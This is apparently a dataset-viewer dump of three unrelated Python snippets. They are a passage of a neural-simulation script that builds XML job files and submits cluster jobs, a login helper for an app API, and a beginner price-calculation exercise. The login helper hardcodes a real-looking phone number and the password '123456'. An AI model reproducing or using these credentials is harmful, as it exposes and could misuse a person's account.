MATRICES[MODELS['clipped']]=['cond7bc12c35-9d87-43fc-8ccc-9223c2714440_0_0.05_0_0_.mat','cond7bc12c35-9d87-43fc-8ccc-9223c2714440_0_0.1_0_0_.mat']
J= [0.05,0.1] # jump size.
DIR_GAIN_STANDARD = 'gain_standard' # directory where the gain results should be produced
DIR_GAIN_CLIPPED = 'gain_clipped'
def check_setup_routine():
for model in MODELS:
if not os.path.exists( MODELS[model]):
raise NameError('Model file missing: ' + MODELS[model])
for matrix in MATRICES[MODELS[model]]:
if not os.path.exists(matrix):
raise NameError('Matrix file missing: ' + matrix)
print('All files present')
def generate_gain_xml_files(xml_file, rates, J, model, matrices, dir):
for j in J:
for rate in rates:
f=ps.xml_file (xml_file)
abs_path = os.path.join(dir, dir + '_' + str(j) + '_' + str(rate) + '.xml')
tag_st = ps.xml_tag('<t_end>0.3</t_end>')
f.replace_xml_tag(tag_st,2.0)
tag_exp =ps.xml_tag('<expression>1000</expression>')
f.replace_xml_tag(tag_exp,rate)
tag_mf = ps.xml_tag('<MatrixFile>condee2a5ff4-0087-4d69-bae3-c0a223d03693_0_0.05_0_0_.mat</MatrixFile>')
if j == 0.05:
f.replace_xml_tag(tag_mf,matrices[0])
if j == 0.1:
f.replace_xml_tag(tag_mf,matrices[1])
tag_con= ps.xml_tag('<Connection In="Inp" Out="AdExp E">1 0.05 0</Connection>')
f.replace_xml_tag(tag_con,j,1)
algs = f.tree.getroot().find('Algorithms')
for a in algs:
if a.attrib['type'] == 'MeshAlgorithm':
a.attrib['modelfile'] = model
f.write(abs_path)
def generate_gain(rerun=True,batch=False):
if not os.path.exists(DIR_GAIN_STANDARD):
sp.call(['mkdir', DIR_GAIN_STANDARD] )
if not os.path.exists(DIR_GAIN_CLIPPED):
sp.call(['mkdir', DIR_GAIN_CLIPPED] )
# the matrix and model files must be present in the gain directories.
sp.call(['cp',MODELS['standard'], DIR_GAIN_STANDARD])
for name in MATRICES[MODELS['standard']]:
sp.call(['cp', name, DIR_GAIN_STANDARD])
# the matrix and model files must be present in the gain directories.
sp.call(['cp',MODELS['clipped'], DIR_GAIN_CLIPPED])
for name in MATRICES[MODELS['clipped']]:
sp.call(['cp', name, DIR_GAIN_CLIPPED])
input_rates = np.arange(0.,3500, 100.)
generate_gain_xml_files('cond.xml',input_rates, [0.05, 0.1], MODELS['standard'], MATRICES[MODELS['standard']],DIR_GAIN_STANDARD)
generate_gain_xml_files('cond.xml',input_rates, [0.05, 0.1], MODELS['clipped'], MATRICES[MODELS['clipped']], DIR_GAIN_CLIPPED)
if rerun == True:
ut.instantiate_jobs(DIR_GAIN_STANDARD,batch)
ut.instantiate_jobs(DIR_GAIN_CLIPPED, batch)
def demofy():
'''This functions massages batch submission scripts so that they have appropriate settings for parameters. If
none are present it is assumed that this is not needed.'''
if not os.path.exists('sub.sh'):
return
with open('sub.sh') as f:
lines = f.readlines()
lines[-1] = '#$ -l h_vmem=16000M\n'
lines.append('demo2D.py ' + MODELS['oslo'] + ' y b')
replines = [ w.replace('4:','12:') for w in lines ]
with open('demo.sh','w') as g:
for line in replines:
g.write(line)
sp.call(['chmod', '+x', 'demo.sh'])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--b', action='store_true')
parser.add_argument('--d', action='store_true')
args = parser.parse_args()
demofy()
if args.d == False:
print('Generating simulation files')
generate_gain(rerun=True,batch=args.b)
if args.d == True:
if args.b == True:
print('Batch option ignored in DST production.')
else:
dst_name = 'DST_' + DIR_GAIN
sp.call(['mkdir',dst_name])
dst_path = os.path.join(sys.path[0], dst_name)
dir_list = sp.check_output(['ls','spectrum/spectrum']).split()
for d in dir_list:
om = d.split('_')[1]
ratefile = 'single'
# sp.call(['cp',os.path.join(DIR_SPECTRUM,DIR_SPECTRUM,d,ratefile),os.path.join(dst_name,'rate_file' + '_' + om)])
# that out of the way, submit visualization as batch job
for d in dir_list:
dir_path = os.path.join(DIR_SPECTRUM, DIR_SPECTRUM, d)
sp.call(['cp','demo.sh',dir_path])
with ut.cd(dir_path):
sp.call(['qsub','demo.sh'])
|
12,498 | 8aa77fa63c1d0e6b8f24fe57c4ce18bc8e3f8c16 | from util.get_tklogintoken import Teamkitlogintoken
from util.get_logincode import qrcode
from log.user_log import UserLog
class envlogin(object):
def __init__(self,driver):
log = UserLog()
logger = log.get_log()
self.driver = driver
Teamkitlogin = Teamkitlogintoken()
Teamkitlogin.url = "https://dnapp.bitkinetic.com/api/v5/login/mplogin"
Teamkitlogin.body = {
"zoneNum": "86",
"phone": "15088132074",
"password": "123456"
}
self.tks = Teamkitlogin.getMerloginHeader()
logger.info("11111111111")
logger.info(self.tks)
print(self.tks)
def tologin(self):
header = self.tks[1]
qrcodelogin = qrcode(self.driver)
qrcodeloginurl = "https://dnapp.bitkinetic.com/api/v5/user/qrcodelogin"
qrcodelogin.toqrcodelogin(qrcodeloginurl,header)
print("22222")
|
12,499 | 8e17bb1d9c5bfe08a049ecab0450bea6c5a7a2f0 | '''
Com base na tabela abaixo, escreva um programa que leia o código de um item e a quantidade deste item. A seguir, calcule e mostre o valor da conta a pagar.
Entrada
O arquivo de entrada contém dois valores inteiros correspondentes ao código e à quantidade de um item conforme tabela acima.
Saída
O arquivo de saída deve conter a mensagem "Total: R$ " seguido pelo valor a ser pago, com 2 casas após o ponto decimal.
'''
linha = input().split(' ')
codigo,qtd = linha
codigo = int(codigo)
qtd = int(qtd)
if codigo == 1:
preco = 4
if codigo == 2:
preco = 4.5
if codigo == 3:
preco = 5
if codigo == 4:
preco = 2
if codigo == 5:
preco = 1.5
conta = qtd * preco
print('Total: R$ %.2f'%conta)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.